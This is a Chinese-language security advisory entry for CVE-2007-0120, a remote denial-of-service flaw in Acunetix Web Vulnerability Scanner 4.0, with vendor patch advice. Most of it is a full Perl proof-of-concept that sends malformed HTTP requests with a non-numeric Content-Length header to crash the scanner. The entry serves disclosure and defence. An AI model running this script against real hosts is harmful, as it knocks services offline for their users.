首页 -> 安全研究

安全研究

安全漏洞
Acunetix Web Vulnerability Scanner远程拒绝服务漏洞

发布日期:2007-01-05
更新日期:2007-01-05

受影响系统:
acunetix Acunetix Web Vulnerability Scanner 4.0
描述:
BUGTRAQ  ID: 21898
CVE(CAN) ID: CVE-2007-0120

Acunetix Web Vulnerability Scanner是Web漏洞扫描器。

Acunetix Web Vulnerability Scanner 4.0 Build 20060717在处理含有无效Content-Length值的多个HTTP请求时,存在远程拒绝服务漏洞,攻击者可利用此漏洞造成应用崩溃。

<*来源:nitr0us
  
  链接:http://xforce.iss.net/xforce/xfdb/31279
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl -w
#
# Acunetix Web Vulnerability Scanner 4.0 <= Build 20060717
# HTTP Sniffer component
# Remote Denial of Service
#
# Explaination:
# I found a DoS in Acunetix WVS doing a little bit of fuzzing.
# The flaw is triggered when a malformed packet is sent. Thus, an
Exception Handler shows
# an Error Window saying: "'die!!!' is not a valid integer value", but,
if we sent the
# same packet again (while that message still visible) the application
will crash.
#
# The malformed HTTP packet contains an invalid 'Content-Length' field
(string), and it
# must be a positive integer.
#
# Acunetix' support: "The bug which was causing it to crash was also
related to another
# bug fix which was implemented in later versions.". So, in latest
version, an Error
# message like this appears:
#  ________________________________________________________
# |wvs.exe                                                 |
# |--------------------------------------------------------|
# |[X] An error ocurred in the application                 |
# |                                  |continue application||
# |                                  |restart application ||
# ||send bug report||show bug report||close applicacion   ||
# |________________________________________________________|
#
# Affected version tested:
# Acunetix WVS (Consultant Edition) 4.0 Build 20060717
#
# Non-affected version tested:
# Acunetix WVS 4.0 Build 20060717
#
# nitr0us <nitrousenador[ at ]gmail[ dot]com>
# 01/01/07 . . . Happy new year.

use strict;
use Socket qw( :DEFAULT :crlf );        # $CRLF
use IO::Socket;

sub header
{
       print
"################################################################\n";
       print "#   Acunetix Web Vulnerability Scanner 4.0 <= Build
20060717   #\n";
       print "#                  HTTP Sniffer component                      
#\n";
       print "#                 Remote Denial of Service                    
#\n";
       print "#                        by nitr0us                            
#\n";
       print
"################################################################\n\n";
       print "Usage: $0 <host> [port(default 8080)]\n";
       exit(0xdead);
}

header() unless $ARGV[0];

my $port = 8080;
my $acunetix_wvs;
my $packetz = 5;

if($ARGV[1]){
       $port = $ARGV[1];
}

print "\n[+] Connecting and sending $packetz malformed packetz\n\n";

for(my $foo = 0; $foo < $packetz; $foo++){
       $acunetix_wvs = IO::Socket::INET->new(  PeerAddr        =>      
$ARGV[0],
                                               PeerPort        =>      
$port,
                                               Proto           =>      
'tcp')
               or die "Could not create socket: $!\n";

       print $acunetix_wvs "GET / HTTP/1.0$CRLF";
       print $acunetix_wvs "Content-Length: die!!!$CRLF$CRLF"; # Trigger

       $acunetix_wvs->close();

       sleep(1);
}

print "[+] $packetz malformed packetz sent ];D\n\n";
print "[+] Acunetix WVS! killed ! ;)\n\n";

建议:
厂商补丁:

acunetix
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.acunetix.com/wvs/

浏览次数:2257
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障